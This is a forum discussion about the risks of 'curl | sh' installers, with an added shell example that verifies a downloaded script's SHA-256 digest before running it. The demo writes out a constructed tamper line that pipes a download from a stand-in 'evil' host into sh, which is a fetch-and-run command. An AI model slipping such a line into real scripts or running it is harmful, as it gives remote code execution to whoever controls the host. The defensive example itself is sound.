by JanisErdmanis 37 days ago
Sometimes I wonder why we don't just treat an installation script like curl https://alx.sh | sh as a universal option for distributing applications. The provenance is there via the HTTPS certificate, and if you're already about to trust an application that can compromise your system, why not trust the installation script as well?
2 comments
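The post asks whether `curl https://alx.sh | sh` is an acceptable distribution channel given that HTTPS already provides provenance. The shell function below is an added example, not from the original post or from alx.sh, showing the minimal hardening a practitioner would apply instead of piping straight into `sh`: download to a file, compare it against a SHA-256 digest pinned from an out-of-band source (release notes, a signed manifest; distro repositories do the equivalent with package signatures), and only then execute. The sample installer, its contents and the `verify_then_run` name are constructed for this example.

```sh
#!/bin/sh
# Added example (not alx.sh's real installer): verify a downloaded install
# script against a pinned SHA-256 digest before executing it.

# Constructed stand-in for what curl would have fetched; any real installer
# would be downloaded to "$1" with curl -fsSLo "$1" <url> instead.
make_sample_installer() {
  printf '#!/bin/sh\necho "installing demo app"\n' > "$1"
}

# Portable SHA-256: sha256sum on GNU userland, shasum on BSD/macOS.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# verify_then_run FILE EXPECTED_SHA256
# Runs FILE only if its digest equals EXPECTED_SHA256; returns 1 and never
# executes anything on mismatch. EXPECTED_SHA256 must come from somewhere
# other than the server that served FILE, or the check adds nothing.
verify_then_run() {
  file=$1
  expected=$2
  actual=$(sha256_of "$file")
  if [ "$actual" != "$expected" ]; then
    echo "refusing to run $file: expected $expected, got $actual" >&2
    return 1
  fi
  sh "$file"
}

# Demo: a matching digest runs the script, a tampered file is rejected.
demo() {
  tmp=$(mktemp)
  make_sample_installer "$tmp"
  pinned=$(sha256_of "$tmp")      # pretend this came from a signed release note
  verify_then_run "$tmp" "$pinned"
  echo 'curl -s https://example.invalid/evil | sh' >> "$tmp"   # constructed tamper
  verify_then_run "$tmp" "$pinned" || echo "tampered installer rejected"
  rm -f "$tmp"
}

demo
```

Downloading to a file first also removes the classic `curl | sh` hazard of a truncated transfer being executed as a partial script. What the digest check does not give you is trust in the author: if the upstream script itself is malicious, a matching digest simply confirms you received the malicious script faithfully.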

The most important argument is phishing. People aren’t good at recognizing when a web site is legitimate. One reason that app certification is a shitshow is that recognizing bad players while minimizing false negatives and false positives is a difficult problem. Domain names fundamentally don’t solve that problem.
> Domain names fundamentally don’t solve that problem.

App certification doesn't solve that problem either.

Because even with HTTPS that script might not do what you expect, and then it is too late: an xz-style attack.
You're already installing a binary, the script is not the weak link here.
It depends; installing binaries on GNU/Linux usually assumes validated distro repos.